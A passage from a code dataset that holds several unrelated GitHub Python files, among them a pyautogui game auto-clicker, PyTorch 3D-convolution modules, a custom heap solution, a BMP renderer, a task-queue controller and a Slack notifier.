sleep(0.5)\r\n\r\n        # look ad\r\n        if time.time() - start > 60 * time_power:\r\n            click(336, 1132)\r\n            sleep(2)\r\n            if look_ad_diff() < 50:\r\n                click(344, 1051)\r\n                sleep(33)\r\n                click(591, 393)\r\n                sleep(1)\r\n                long_ad_handle()\r\n                sleep(2)\r\n                time_power += 0.5\r\n            time_power += 1\r\n\r\n        # add goods\r\n        if time.time() - start > 60 * time_add_goods:\r\n            # canteen\r\n            click(492, 1033)\r\n            sleep(1)\r\n            click(492, 1033)\r\n            sleep(2)\r\n            for i in range(2):\r\n                pag.mouseDown(130, 1305)\r\n                pag.moveTo(455, 1305)\r\n                sleep(1)\r\n            click(158, 1316)\r\n            sleep(1)\r\n            click(285, 973)\r\n            sleep(1)\r\n            click(155, 875)\r\n            sleep(1)\r\n            click(511, 692)\r\n            sleep(1)\r\n            # money\r\n            click(446, 1033)\r\n            click(367, 984)\r\n            click(401, 910)\r\n            click(478, 866)\r\n            sleep(1)\r\n            click(158, 1316)\r\n            sleep(1)\r\n            click(61, 1434)\r\n            sleep(2)\r\n\r\n            # bash_room\r\n            click(445, 928)\r\n            sleep(1)\r\n            click(445, 928)\r\n            sleep(2)\r\n            for i in range(3):\r\n                pag.mouseDown(130, 1305)\r\n                pag.moveTo(455, 1305)\r\n                sleep(1)\r\n            click(158, 1316)\r\n            sleep(1)\r\n            click(338, 1061)\r\n            sleep(1)\r\n            click(225, 945)\r\n            sleep(1)\r\n            click(362, 880)\r\n            sleep(1)\r\n            # money\r\n            click(513, 1150)\r\n            sleep(1)\r\n            click(456, 907)\r\n            sleep(1)\r\n            for i in range(2):\r\n                pag.mouseDown(455, 1305)\r\n                pag.moveTo(130, 1305)\r\n                sleep(1)\r\n            click(158, 1316)\r\n            sleep(1)\r\n            click(290, 1028)\r\n            sleep(1)\r\n            click(61, 1434)\r\n            sleep(2)\r\n\r\n            time_power += 0.5\r\n            time_add_goods += 2\r\n\r\n        if time_power > 600:\r\n            break\r\n\r\ndef get_position():\r\n    try:\r\n        while True:\r\n            print('Press Ctrl-C to end')\r\n            screenWidth, screenHeight = pag.size() # get the screen size\r\n            x, y = pag.position() # get the current mouse coordinates\r\n            print('Screen size: (%s %s), Position : (%s, %s)' % (screenWidth, screenHeight, x, y)) # print the coordinates\r\n            time.sleep(1) # print once per second, then clear the screen\r\n            os.system('cls') # run the system clear-screen command\r\n    except KeyboardInterrupt:\r\n        print('end')\r\n\r\ndef long_ad_handle():\r\n    \"\"\"If this is a long ad\"\"\"\r\n    if long_ad() < 50:\r\n        click(197, 1061)\r\n        sleep(11)\r\n        click(591, 393)\r\n        sleep(1)\r\n\r\ndef canteen_material():\r\n    \"\"\"Canteen Titan dishes\"\"\"\r\n    while True:\r\n        while True:\r\n            # refill energy to full\r\n            click(316, 436)\r\n            sleep(1)\r\n            if look_ad_diff() < 100:\r\n                click(330, 1053)\r\n                sleep(2)\r\n                if look_ad_diff() > 100:\r\n                    sleep(31)\r\n                    click(591, 393)\r\n                    sleep(1)\r\n                    # check whether this is a long ad\r\n                    long_ad_handle()\r\n                    click(320, 1159)\r\n                    sleep(1)\r\n                else:\r\n                    click(320, 1159)\r\n                    sleep(1)\r\n                    break\r\n            else:\r\n                click(320, 1159)\r\n                sleep(10)\r\n                break\r\n        count = 1\r\n        stop_flag = False\r\n        all_stop_flag = False\r\n        while True:\r\n            if all_stop_flag:\r\n                break\r\n            for j in range(8):\r\n                for i in range(6):\r\n                    click(95 + i * 100, 629 + j * 100)\r\n                for i in range(6):\r\n                    if count > 30:\r\n                        click(95 + i * 100, 629 + j * 100)\r\n                        sleep(0.2)\r\n                        if reset_ad_diff() < 100:\r\n                            click(464, 1031)\r\n                            sleep(1)\r\n                            stop_flag = True\r\n                            count = 1\r\n                            break\r\n                    else:\r\n                        click(95 + i * 100, 629 + j * 100)\r\n                    count += 6\r\n            if stop_flag:\r\n                all_stop_flag = True\r\n                break\r\n            # if 
j == 3 and i\n\n\n\n\nif __name__ == '__main__':\n auto_click()\n # get_position()\n # canteen_material()\n # print(reset_ad_diff())\n # long_ad()\n # cut_img()\n# pag.mouseDown(130, 1305)\n# pag.moveTo(455, 1305)\n# scroll(100, x=235, y=1311)\n#\n","repo_name":"huanhuan18/mywork","sub_path":"自动点击屏幕/pyautogui/game_wudong_hotel/autogui_click.py","file_name":"autogui_click.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10791603427","text":"from __future__ import division\r\nimport torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\n\r\nclass S_Module(nn.Module):\r\n def __init__(\r\n self,\r\n inplanes=1024,\r\n planes=2048,\r\n ):\r\n super(S_Module, self).__init__()\r\n\r\n self.S1 = ConvModule(inplanes, planes, kernel_size=(1, 3, 3), stride=(1, 1, 1), padding=(0, 1, 1), bias=False)\r\n\r\n def forward(self, inputs):\r\n out = []\r\n feat3,feat4 = inputs[0],inputs[1]\r\n out.append(self.S1(feat3))\r\n out.append(feat4)\r\n return out\r\n\r\nclass ConvModule(nn.Module):\r\n def __init__(\r\n self,\r\n inplanes,\r\n planes,\r\n kernel_size,\r\n stride,\r\n padding,\r\n bias=False,\r\n groups=32,\r\n ):\r\n super(ConvModule, self).__init__()\r\n self.conv = nn.Conv3d(inplanes, planes, kernel_size, stride, padding, bias=bias, groups=groups)\r\n self.bn = nn.BatchNorm3d(planes)\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n def forward(self, x):\r\n x1 = self.conv(x)\r\n x1 = self.bn(x1)\r\n out = self.relu(x1)\r\n return out\r\n\r\n\r\nclass MidAggr(nn.Module):\r\n def __init__(\r\n self,\r\n inplanes,\r\n planes,\r\n loss_weight=0.5\r\n ):\r\n super(MidAggr, self).__init__()\r\n self.convs = ConvModule(inplanes, inplanes, kernel_size=(3, 3, 3), stride=(1, 1, 1), padding=(0, 1, 1), bias=False)\r\n\r\n def forward(self, x):\r\n x = self.convs(x)\r\n return x\r\n\r\n\r\nclass T_Module(nn.Module):\r\n def __init__(self,\r\n inplanes,\r\n planes,\r\n downsample_scale=3,\r\n ):\r\n super(T_Module, self).__init__()\r\n\r\n self.conv = nn.Conv3d(inplanes, planes, (3, 1, 1), (1, 1, 1), (1, 0, 0), bias=False, groups=32)\r\n self.pool = nn.MaxPool3d((downsample_scale, 1, 1), (downsample_scale, 1, 1), (0, 0, 0), ceil_mode=True)\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.pool(x)\r\n return x\r\n\r\n\r\nclass Upsampling(nn.Module):\r\n def __init__(self,\r\n scale=(2, 1, 1),\r\n ):\r\n super(Upsampling, self).__init__()\r\n self.scale = scale\r\n\r\n def forward(self, x):\r\n x = F.interpolate(x, scale_factor=self.scale, mode='nearest')\r\n return x\r\n\r\n\r\nclass Downampling(nn.Module):\r\n def __init__(self,\r\n inplanes,\r\n planes,\r\n kernel_size=(3, 1, 1),\r\n stride=(1, 1, 1),\r\n padding=(1, 0, 0),\r\n bias=False,\r\n groups=32,\r\n norm=False,\r\n activation=False,\r\n downsample_position='after',\r\n downsample_scale=(1, 2, 2),\r\n ):\r\n\r\n super(Downampling, self).__init__()\r\n self.conv = nn.Conv3d(inplanes, planes, kernel_size, stride, padding, bias=bias, groups=groups)\r\n self.norm = nn.BatchNorm3d(planes) if norm else None\r\n self.relu = nn.ReLU(inplace=True) if activation else None\r\n assert (downsample_position in ['before', 'after'])\r\n self.downsample_position = downsample_position\r\n self.pool = nn.MaxPool3d(downsample_scale, downsample_scale, (0, 0, 0), ceil_mode=True)\r\n\r\n def forward(self, x):\r\n if self.downsample_position == 'before':\r\n x = self.pool(x)\r\n x = self.conv(x)\r\n if self.norm is not 
None:\r\n x = self.norm(x)\r\n if self.relu is not None:\r\n x = self.relu(x)\r\n if self.downsample_position == 'after':\r\n x = self.pool(x)\r\n\r\n return x\r\n\r\n\r\nclass CrossFusion(nn.Module):\r\n def __init__(self,\r\n in_channels=[1024, 1024],\r\n mid_channels=[1024, 1024],\r\n out_channels=2048\r\n ):\r\n super(CrossFusion, self).__init__()\r\n\r\n self.m1 = ConvModule(in_channels[0],mid_channels[0],kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False, groups=32)\r\n self.m2 = ConvModule(in_channels[1],mid_channels[1],kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False, groups=32)\r\n\r\n in_dims = np.sum(mid_channels)\r\n self.fusion_conv = nn.Sequential(\r\n nn.Conv3d(in_dims, out_channels, 1, 1, 0, bias=False),\r\n nn.BatchNorm3d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\n def forward(self, inputs):\r\n out = [self.m1(inputs[0]),self.m2(inputs[1])]\r\n out = torch.cat(out, 1)\r\n out = self.fusion_conv(out)\r\n return out\r\n\r\nclass Prototype(nn.Module):\r\n\r\n def __init__(self,\r\n in_channels=[1024, 2048],\r\n out_channels=1024\r\n ):\r\n super(Prototype, self).__init__()\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.num_ins = len(in_channels)\r\n self.t_modulation_ops = nn.ModuleList()\r\n self.upsampling_ops = nn.ModuleList()\r\n self.level_fusion_op = CrossFusion()\r\n self.s_modulation = S_Module()\r\n\r\n for i in range(0, self.num_ins, 1):\r\n t_modulation = T_Module(2048,1024)\r\n self.t_modulation_ops.append(t_modulation)\r\n\r\n self.downsampling = Downampling(1024, 1024, kernel_size=(3, 1, 1), stride=(1, 1, 1),\r\n padding=(1, 0, 0), bias=False,downsample_scale = (1, 1, 1))\r\n\r\n out_dims =2048\r\n self.level_fusion_op2 = CrossFusion()\r\n\r\n self.pyramid_fusion_op = nn.Sequential(\r\n nn.Conv3d(out_dims * 2, 2048, 1, 1, 0, bias=False),\r\n nn.BatchNorm3d(2048),\r\n nn.ReLU(inplace=True)\r\n )\r\n self.mid_aggr_3 = MidAggr(1024,1024)\r\n self.mid_aggr_2 = MidAggr(256,256)\r\n self.mid_aggr_1 = MidAggr(128, 128)\r\n\r\n def init_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv3d):\r\n nn.init.kaiming_normal_(m.weight,mode='fan_out', nonlinearity='relu')\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n if isinstance(m, nn.BatchNorm3d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0)\r\n\r\n def forward(self, inputs_all):\r\n\r\n feat4,feat3,feat2,feat1= inputs_all[0],inputs_all[1],inputs_all[2],inputs_all[3]\r\n\r\n feat3_new = self.mid_aggr_3(feat3)\r\n feat2_new = self.mid_aggr_2(feat2)\r\n feat1_new = self.mid_aggr_1(feat1)\r\n\r\n inputs = [feat3,feat4]\r\n outs = self.s_modulation(inputs)\r\n\r\n outs = [t_modulation(outs[i]) for i, t_modulation in enumerate(self.t_modulation_ops)]\r\n outs0 = outs\r\n\r\n outs[1] = outs[1]+ outs[0]\r\n outs1 = self.level_fusion_op2(outs)\r\n outs = outs0\r\n\r\n if self.downsampling is not None:\r\n outs[1] = outs[1]+self.downsampling(outs[0])\r\n outs = self.level_fusion_op(outs)\r\n\r\n outs = self.pyramid_fusion_op(torch.cat([outs1, outs], 1))\r\n outs = outs.squeeze(2)\r\n feat3_new =feat3_new.squeeze(2)\r\n feat2_new = feat2_new.squeeze(2)\r\n feat1_new = feat1_new.squeeze(2)\r\n return outs,feat3_new,feat2_new,feat1_new","repo_name":"huangxx156/VADNet","sub_path":"models/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} 
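The prototype.py record above composes its fusion network from one repeated unit: a grouped Conv3d followed by BatchNorm3d and ReLU (its ConvModule class). A minimal, self-contained sketch of that pattern, assuming only that PyTorch is installed; the input shape (batch 2, 64 channels, 8 frames, 16x16 spatial) and the channel counts are arbitrary illustrative choices, not values taken from the record:

import torch
import torch.nn as nn

# grouped 3D conv + batch norm + ReLU, mirroring the ConvModule pattern above;
# groups=32 splits the 64 input channels into 32 groups of 2
conv_unit = nn.Sequential(
    nn.Conv3d(64, 128, kernel_size=(1, 3, 3), stride=(1, 1, 1),
              padding=(0, 1, 1), bias=False, groups=32),
    nn.BatchNorm3d(128),
    nn.ReLU(inplace=True),
)

x = torch.randn(2, 64, 8, 16, 16)  # (N, C, T, H, W)
print(conv_unit(x).shape)          # torch.Size([2, 128, 8, 16, 16]): T, H, W preserved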
+{"seq_id":"18930189775","text":"import sys\nsys.stdin = open(\"input.txt\")\n\ninput = sys.stdin.readline\n\ndef my_shiftdown(heap, startpos, pos):\n newitem = heap[pos]\n while pos > startpos:\n parentpos = (pos - 1) >> 1\n parent = heap[parentpos]\n if newitem < parent:\n heap_idx.pop(heap[pos])\n heap_idx[parent] = pos\n heap[pos] = parent\n pos = parentpos\n continue\n break\n heap_idx.pop(heap[pos])\n heap_idx[newitem] = pos\n heap[pos] = newitem\n\ndef my_heappush(heap, item):\n size = len(heap)\n heap_idx[item] = size\n heap.append(item)\n my_shiftdown(heap, 1, size)\n\ndef my_shiftup(heap, pos):\n endpos = len(heap)\n startpos = pos # 최상단 인덱스 저장\n newitem = heap[pos]\n\n childpos = 2 * pos + 1\n while childpos < endpos:\n rightpos = childpos + 1\n if rightpos < endpos and not heap[childpos] < heap[rightpos]:\n childpos = rightpos\n heap_idx.pop(heap[pos])\n heap_idx[heap[childpos]] = pos\n heap[pos] = heap[childpos]\n pos = childpos\n childpos = 2 * pos + 1\n\n heap_idx.pop(heap[pos])\n heap_idx[newitem] = pos\n heap[pos] = newitem\n my_shiftdown(heap, startpos, pos) # pop됐던 newitem 자리 찾아주기\ndef my_heappop(heap):\n lastitem = heap.pop()\n\n if heap:\n returnitem = heap[1]\n heap_idx.pop(heap[1])\n heap[lastitem] = 1\n heap[1] = lastitem\n my_shiftup(heap, 1)\n return returnitem\n return lastitem\n\nn = int(input())\narr = [0] + list(map(int, input().split()))\n\nm = int(input()) # 쿼리 수\n\nheap = [0] + [arr[i] for i in range(1, n + 1)]\nheap_idx = {}\nfor i in range(1, n + 1):\n heap_idx[arr[i]] = i\n\nfor i in range(m):\n query = list(map(int, input().split()))\n\n if query[0] == 1: # Ai를 v로 바꾼다.\n heap[heap_idx[arr[query[1]]]] = query[2]\n arr[query[1]] = query[2]\n\n elif query[0] == 2: # heap.pop() -> heap.push()\n min_v = my_heappop(heap)\n print(heap_idx[min_v])\n my_heappush(heap, min_v)\n","repo_name":"WonilLee211/TIL","sub_path":"Algorithm/BOJ/14427_heapq_custom.py","file_name":"14427_heapq_custom.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70832250000","text":"#!/usr/bin/env python\nprint(\"Hello!\")\ntrys=1\npin=\"1234\"\nwhile True: \n user_input = input(\"Please enter your PIN: \") \n print(f'You entered: {user_input}') \n if trys == 3:\n print(\"Account locked. The police is on its way.\")\n break\n elif user_input == pin:\n print(\"Your account balance is: 0. 
Goodbye!\")\n break\n else:\n trys += 1\n \n","repo_name":"ashfaqrehman/ATMPinCode","sub_path":"atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30176057482","text":"from data_types_module import dword, word, char\nfrom utils import color\n\nBLACK = color(0,0,0)\nWHITE = color(255,255,255)\nRED = color(255,0,0)\n\nclass Render(object):\n\n\t#constructor\n\tdef __init__(self):\n\t\tself.framebuffer = []\n\t\tself.curr_color = WHITE\n\n\tdef glCreateWindow(self, width, height):\n\t\t#width and height for the framebuffer\n\t\tself.width = width\n\t\tself.height = height\n\n\tdef glInit(self):\n\t\tself.curr_color = BLACK\n\t\t\n\n\tdef glViewport(self, x, y, width, height):\n\t\tself.viewportX = x\n\t\tself.viewportY = y\n\t\tself.viewportWidth = width\n\t\tself.viewportHeight = height\n\n\tdef glClear(self):\n\t\tself.framebuffer = [[BLACK for x in range(self.width)] for y in range(self.height)]\n\n\tdef glClearColor(self, r, g, b):\n\t\tclearColor = color( \n\t\t\t\tround(r * 255),\n\t\t\t\tround(g * 255),\n\t\t\t\tround(b * 255)\n\t\t\t)\n\n\t\tself.framebuffer = [[clearColor for x in range(self.width)] for y in range(self.height)]\n\n\tdef glVertex(self, x, y):\n\t\t#las funciones fueron obtenidas de https://www.khronos.org/registry/OpenGL-Refpages/es2.0/xhtml/glViewport.xml\n\t\tX = round((x+1) * (self.viewportWidth/2) + self.viewportX)\n\t\tY = round((y+1) * (self.viewportHeight/2) + self.viewportY)\n\t\tself.point(X,Y)\n\n\tdef glColor(self, r, g, b):\n\t\tself.curr_color = color(round(r * 255),round(g * 255),round(b * 255))\n\n\n\tdef point(self, x, y):\n\t\tself.framebuffer[x][y] = self.curr_color\n\n\n\tdef glFinish(self, filename):\n\t\tarchivo = open(filename, 'wb')\n\n\t\t# File header 14 bytes\n\t\tarchivo.write(char(\"B\"))\n\t\tarchivo.write(char(\"M\"))\n\t\tarchivo.write(dword(14+40+self.width*self.height))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(14+40))\n\n\t\t#Image Header 40 bytes\n\t\tarchivo.write(dword(40))\n\t\tarchivo.write(dword(self.width))\n\t\tarchivo.write(dword(self.height))\n\t\tarchivo.write(word(1))\n\t\tarchivo.write(word(24))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(self.width * self.height * 3))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(0))\n\n\n\t\t#Pixeles, 3 bytes cada uno\n\n\t\tfor x in range(self.height):\n\t\t\tfor y in range(self.width):\n\t\t\t\tarchivo.write(self.framebuffer[x][y])\n\n\n\t\t#Close file\n\t\tarchivo.close()\n\n\n\n","repo_name":"RobertoFigueroa/BMP-creator","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21992687523","text":"# coding=utf-8\n\nimport logging\n\nfrom enum import Enum\nfrom gevent.queue import JoinableQueue\n\nimport get_time\nfrom controller_msg import msg_dict\n\nlogging.basicConfig(level=\"INFO\")\n\n\nclass DispatchResult(Enum):\n pass\n\n\nclass TaskStatus(Enum):\n pass\n\n\nclass ControllerQueue(object):\n def __init__(self, controller_queue_uuid, group_block, trigger_time):\n self.create_time = get_time.current_ymd_hms()\n # self.create_time = \"2017-01-01 12:00:00\"\n self.group_block = group_block\n self.trigger_time = trigger_time\n self.controller_queue_status = 0\n self.controller_queue_uuid = controller_queue_uuid\n 
        self.controller_todo_task_queue = JoinableQueue()\n        self.controller_task_list = list()\n        self.controller_task_status_list = list()\n        self.controller_task_result_list = list()\n\n    def to_dict(self):\n        \"\"\"\n        Convert to a dictionary\n        \"\"\"\n        return {\n            \"create_time\": self.create_time,\n            \"trigger_time\": self.trigger_time,\n            \"group_block\": self.group_block,\n            \"controller_queue_status\": self.controller_queue_status,\n            \"controller_queue_uuid\": self.controller_queue_uuid,\n            \"task_list\": self.controller_task_list,\n            \"task_result_list\": self.controller_task_result_list,\n            \"task_status_list\": self.controller_task_status_list\n        }\n\n    def put_controller_todo_task_queue(self, task, deserialize=False):\n        \"\"\"\n        Put a task into the controller's to-do queue\n        :param task: the task\n        :param deserialize: whether this call comes from deserialization\n        \"\"\"\n        task_uuid = task[\"task_uuid\"]\n        task_earliest = task[\"earliest\"]\n        task_latest = task[\"latest\"]\n        if not deserialize:\n            self.controller_task_list.append(task)\n            self.controller_task_status_list.append({task_uuid: None})\n            self.controller_task_result_list.append({task_uuid: None})\n        task = task[\"detail\"]\n        self.controller_todo_task_queue.put(\n            {\"controller_queue_uuid\": self.controller_queue_uuid, \"controller_queue_create_time\": self.create_time,\n             \"controller_queue_trigger_time\": self.trigger_time, \"task_uuid\": task_uuid, \"task_earliest\": task_earliest,\n             \"task_latest\": task_latest, \"task\": task})\n\n    def peek_controller_todo_task_queue(self, task_uuid):\n        \"\"\"\n        Peek at the first task in the controller's to-do queue\n        :param task_uuid: uuid of the task\n        \"\"\"\n        if self.controller_todo_task_queue.empty():\n            return -1, msg_dict[-11]\n        ret = self.controller_todo_task_queue.peek()\n        if ret[\"task_uuid\"] == task_uuid:\n            return 0, u\"this task is the next task to execute\"\n        else:\n            return -1, u\"this task is not the next task to execute\"\n\n    def get_controller_todo_task_queue(self):\n        \"\"\"\n        Take a task out of the controller's to-do queue\n        \"\"\"\n        if self.controller_todo_task_queue.empty():\n            return -1, msg_dict[-11]\n        if self.controller_queue_status != 0:\n            return -1, msg_dict[self.controller_queue_status]\n        if not self.controller_todo_task_queue.empty() and self.controller_queue_status == 0:\n            task = self.controller_todo_task_queue.get()\n            self.controller_queue_status = 11\n            return 0, task\n\n    def put_left_controller_todo_task_queue(self):\n        \"\"\"\n        Push failed tasks back onto the to-do queue\n        \"\"\"\n        if self.controller_queue_status != 14:\n            # the queue cannot be recovered\n            # return -1, msg_dict[self.controller_queue_status]\n            return -1, u'queue state cannot be recovered, current state: {}'.format(msg_dict[self.controller_queue_status])\n        else:\n            # collect the uuids of the failed tasks\n            fail_task_uuid_list = list()\n            for each in self.controller_task_status_list:\n                if each.values()[0] and each.values()[0][0] in (1, 2, 3):\n                    # the task failed or timed out\n                    each.update({each.keys()[0]: None})\n                    fail_task_uuid_list.append(each.keys()[0])\n            if not fail_task_uuid_list:\n                return -1, u\"the queue has no failed tasks\"\n            # push the failed tasks onto the queue first\n            temp_queue = JoinableQueue()\n            for each in self.controller_task_list:\n                if each[\"task_uuid\"] in fail_task_uuid_list:\n                    temp_queue.put(\n                        {\"controller_queue_uuid\": self.controller_queue_uuid,\n                         \"controller_queue_create_time\": self.create_time,\n                         \"controller_queue_trigger_time\": self.trigger_time,\n                         \"task_uuid\": each[\"task_uuid\"], \"task_earliest\": each[\"earliest\"],\n                         \"task_latest\": each[\"latest\"], \"task\": each[\"detail\"]}\n                    )\n            # update task_status_list and task_result_list\n            for each1 in fail_task_uuid_list:\n                for each2 in self.controller_task_status_list:\n                    if each1 == each2.keys()[0]:\n                        each2.update({each1: None})\n                for each2 in self.controller_task_result_list:\n                    if each1 == each2.keys()[0]:\n                        each2.update({each1: None})\n            # push the original pending tasks back as well\n            while not self.controller_todo_task_queue.empty():\n                temp_queue.put(self.controller_todo_task_queue.get())\n            self.controller_todo_task_queue = temp_queue\n            self.controller_queue_status = 0\n            return 0, u\"failed tasks in the queue were recovered successfully\"\n\n    def pop_controller_todo_task_queue(self):\n        \"\"\"\n        Remove the first item from the to-do queue\n        \"\"\"\n        if self.controller_todo_task_queue.empty():\n            return -1, msg_dict[-11]\n        task = self.controller_todo_task_queue.get()\n        task_uuid = task[\"task_uuid\"]\n        # update the task status list\n        for each in self.controller_task_status_list:\n            for (k, v) in each.iteritems():\n                if k == task_uuid:\n                    each[k] = 4\n        return 0, u\"first item in the queue removed successfully\"\n\n    def change_task_info(self, task_uuid, task_status, session, task_result):\n        \"\"\"\n        Update the task status in task_status_list and task_result_list\n        :param task_uuid: uuid of the task\n        :param task_status: status of the task\n        :param session: user session\n        :param task_result: execution result of the task\n        \"\"\"\n        if task_status[0] == -1:\n            # task initialization failed\n            self.controller_queue_status = -13\n        if task_status[0] == 0:\n            # task executed successfully\n            self.controller_queue_status = 0\n        if task_status[0] in (1, 121):\n            # task execution failed\n            self.controller_queue_status = 14\n        if task_status[0] in (111, 112):\n            # task is waiting\n            self.controller_queue_status = 13\n        if task_status[0] == 200:\n            # task started executing\n            if not self.group_block:\n                # non-blocking queue\n                self.controller_queue_status = 0\n            else:\n                # blocking queue\n                self.controller_queue_status = 12\n        # update the task status list\n        for each in self.controller_task_status_list:\n            for (k, v) in each.iteritems():\n                if k == task_uuid:\n                    each[k] = (task_status[0], session)\n        for each in self.controller_task_result_list:\n            for (k, v) in each.iteritems():\n                if k == task_uuid and task_result:\n                    each[k] = task_result.to_dict()\n\n    def update_task_info(self, task_uuid, task_info):\n        if task_uuid not in map(lambda x: x[\"task_uuid\"], self.controller_task_list):\n            return -1, u\"no matching task found\"\n        else:\n            # update task_status_list\n            for each in self.controller_task_status_list:\n                if task_uuid in each.keys():\n                    if each.get(task_uuid) == 0:\n                        return -1, u\"a successful task cannot be modified\"\n                    else:\n                        each.update({task_uuid: None})\n            # update task_result_list\n            for each in self.controller_task_result_list:\n                if task_uuid in each.keys():\n                    if isinstance(each.get(task_uuid), list) and each.get(task_uuid)[0] == 0:\n                        return -1, u\"a successful task cannot be modified\"\n                    else:\n                        each.update({task_uuid: None})\n            # update task_list\n            for each in self.controller_task_list:\n                if task_uuid == each.get(\"task_uuid\"):\n                    self.controller_task_list[self.controller_task_list.index(each)] = task_info\n            # collect the uuids of tasks that are still to do\n            todo_task_list = filter(lambda x: not x.values()[0], self.controller_task_status_list)\n            todo_task_list = map(lambda x: x.keys()[0], todo_task_list)\n            # rebuild the to-do queue\n            self.controller_todo_task_queue = JoinableQueue()\n            for task_uuid in todo_task_list:\n                for each in self.controller_task_list:\n                    if each.get(\"task_uuid\") == task_uuid:\n                        self.controller_todo_task_queue.put(\n                            {\"controller_queue_uuid\": self.controller_queue_uuid,\n                             \"controller_queue_create_time\": self.create_time,\n                             \"controller_queue_trigger_time\": self.trigger_time, \"task_uuid\": task_uuid,\n                             \"task_earliest\": each.get(\"task_earliest\"), \"task_latest\": each.get(\"task_latest\"),\n                             \"task\": each.get(\"detail\")})\n            self.controller_queue_status = 0\n            return 0, u\"update succeeded\"\n","repo_name":"rocklym/Unified-OPs-System","sub_path":"TaskManager/controller_queue.py","file_name":"controller_queue.py","file_ext":"py","file_size_in_byte":9909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
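put_left_controller_todo_task_queue in the record above recovers a queue by re-enqueuing failed tasks ahead of the tasks that are still pending. A simplified, dependency-free sketch of that requeue pattern, with plain sequences standing in for gevent's JoinableQueue and invented task names:

from collections import deque

def requeue_failed(pending, failed):
    # failed tasks go back to the front in their original order,
    # followed by whatever was still waiting to run
    q = deque(failed)
    q.extend(pending)
    return q

print(list(requeue_failed(pending=["t3", "t4"], failed=["t1", "t2"])))
# ['t1', 't2', 't3', 't4']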
+{"seq_id":"30570987073","text":"import os\nimport subprocess\nrootdir = os.path.split(__file__)[0]\n\ndef number_in_line(line):\n wordlist = line.split(' ')\n for _, item in enumerate(wordlist):\n try: number = float(item) \n except ValueError: continue\n \n return number\n\ndef pc_error(infile1, infile2, resolution, test_d2=False, DBG=False):\n headers = [\"mseF (p2point)\", \"mseF,PSNR (p2point)\"]\n command = str(rootdir+'/pc_error_d' + \n ' -a '+infile1+ \n ' -b '+infile2+ \n ' --hausdorff=1 '+ \n ' --resolution='+str(resolution))\n if test_d2:\n headers +=[\"mseF (p2plane)\", \"mseF,PSNR (p2plane)\"]\n command = str(command + ' -n ' + infile1)\n results = {} \n subp=subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n subp.wait()\n c=subp.stdout.readline()\n while c:\n if DBG: print(c)\n line = c.decode(encoding='utf-8')\n for _, key in enumerate(headers):\n if line.find(key) != -1:\n value = number_in_line(line)\n results[key] = value\n c=subp.stdout.readline() \n\n return subp, results\n","repo_name":"yydlmzyz/Test-GPCC","sub_path":"pc_error.py","file_name":"pc_error.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"35245149901","text":"# -*- coding: utf-8 -*-\n'''\nlanguage = python\n\nid = Tree tearing\n\nqlink = https://www.hackerearth.com/practice/algorithms/greedy/basics-of-greedy-algorithms/practice-problems/algorithm/tree-tearing-easy-contest/\n\nauthor: amir hejazi\n'''\nfrom collections import defaultdict\nimport sys\n\nsys.setrecursionlimit(100000)\n\n\nk = int(input())\nn = int(input())\n\n\nif n == 1:\n print(0)\nelif k ==1:\n vertices = input()\n print(n)\nelse:\n vertices = list(map(int, input().strip().split())) \n res = 0\n\n def dfs(adj, visited, i, k):\n global res\n des = 1\n visited[i] = True\n for j in adj[i]:\n if not visited[j]:\n des += dfs(adj, visited, j, k)\n \n if des >= k:\n res += 1\n des = 0\n return des\n\n graph = defaultdict(list)\n\n for i in range(2, len(vertices) + 2):\n v = vertices[i - 2]\n graph[i].append(v)\n graph[v].append(i)\n \n\n seen = [False] * (n + 1)\n dfs(graph, seen, 1, k)\n print(res)\n","repo_name":"Amirkhaksar/Hackerearth","sub_path":"Tree tearing/Tree tearing.py","file_name":"Tree tearing.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"29"} +{"seq_id":"72267279759","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\nimport json\n\nimport requests\n\nfrom src.config import *\n\ndef sendmsg(name, text):\n msg = name + ': ' + str(text)\n requests.post(SLACK_URL, data = json.dumps({\n 'text': msg,\n 'username': 'MFcloud',\n }))\n\nif __name__ == '__main__':\n sendmsg('test', 'test dayo-\\nすっごーい!!')\n","repo_name":"Im-neko/timecard","sub_path":"src/msg.py","file_name":"msg.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12465549497","text":"\n# coding: utf-8\n\n\n\n\nimport numpy as np\nimport json\nfrom numpy import genfromtxt\nraw_data = 